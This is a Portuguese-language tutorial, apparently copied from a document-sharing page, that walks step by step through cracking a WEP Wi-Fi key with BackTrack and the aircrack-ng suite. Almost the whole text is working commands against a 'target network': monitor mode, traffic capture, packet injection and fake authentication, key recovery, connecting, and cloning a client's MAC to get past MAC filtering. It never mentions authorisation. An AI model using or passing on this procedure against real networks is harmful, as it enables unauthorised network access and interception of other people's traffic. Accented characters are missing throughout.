Você está na página 1de 1

COMO QUEBRAR UMA CHAVE WEP UTILIZANDO BACKTRACK + AIRCRACK-NG 1.

Carregue o Backtrack a partir de uma imagem ou de uma midia (DVD ou Pen Drive). Escolha o modo de inicializao. Para iniciar a interface grfica, espere o sistema disponibilizar a Console e digite: startx Se a interface wireless no for carregada automaticamente, digite o comando a seguir para levant-la: ifconfig wlan0 up Verifique se a interface foi carregada atravs do comando abaixo: iwconfig Se tudo estiver certo, ento coloque a interface de rede wireless em modo promscuo (modo monitor): airmon-ng start wlan0 Ser criada uma interface de monitorao virtual (no meu caso, mon0). Verifique atravs do comando: iwconfig Inicie o ataque executando o comando de captura sem parmetros adicionais. Isso permitir verificar quais redes esto sendo enxergadas. airodump-ng mon0 Uma vez definida a rede alvo, anote o MAC ADDRESS do AP e o canal utilizado por ela e em seguida pare a monitorao (CTRL+C). Digite o comando abaixo para iniciar a captura de trfego da rede alvo. Lembre-se que a rede deve utilizar WEP, e quanto mais clientes conectados rede, mais rpido ser o ataque: airodump-ng --ivs --bssid MAC_ADDRESS_AP --channel CANAL --write wifi mon0 Deixe a monitorao executando e abra outro shell.

2.

3.

4.

5.

6.

7.

8.

9.

10. Na nova janela, teste se sua placa de rede capaz de injetar trfego na rede, permitindo um ataque ativo (e mais rpido): aireplay-ng -9 mon0 11. Se sua placa no suporta injeo de pacotes, aguarde a captura de trfego de forma passiva, at que sejam capturados aproximadamente 20.000 IVs (para chaves de 64 bits). Depois pule para o passo 16. 12. Se for possvel injetar pacotes, execute o comando abaixo: aireplay-ng -3 -b MAC_ADDRESS_AP -h MAC_ADDRESS_ORI -x 100 mon0 13. Aguarde at que seja mostrado um pacote que possua condies de ser injetado na rede. Voc ser perguntado se deseja utiliz-lo. Responda que sim e deixe o comando executando. Este procedimento pode demorar, em redes com poucos clientes. 14. Se houverem poucos clientes conectados rede alvo, abra uma terceira janela e execute o comando abaixo vrias vezes para realizar autenticaes falsas e gerar mais trfego. aireplay-ng -1 0 -a MAC_ADDRESS_AP -h MAC_ADDRESS_ORI mon0 15. Aguarde at que sejam capturados aproximadamente 20.000 IVs (para chaves de 64 bits). 16. Quando tiver uma quantidade suficiente de dados capturados, execute o comando que ir analisar essas informaes e descobrir a chave WEP utilizada (em formato hexadecimal): aircrack-ng wifi-01.ivs 17. Agora s esperar at que a chave seja encontrada. 18. Uma vez descoberta a chave, pode interromper todos os comandos em execuo. 19. Para desligar o modo de monitorao da placa, digite: airmon-ng stop mon0 20. Verifique as configuraes da sua placa wireless: iwconfig 21. Se quiser conectar rede atravs do terminal, execute os comandos abaixo: iwconfig wlan0 essid NOME_REDE iwconfig wlan0 key CHAVE_WEP ifconfig wlan0 up dhclient wlan0 22. Caso no consiga conectar-se, provvel que a rede utilize controle de acesso por endereo MAC. Utilizando o airodump novamente, voc pode descobrir o MAC de um cliente vlido (associado) e clon-lo em sua mquina. Depois, tente conectar-se novamente.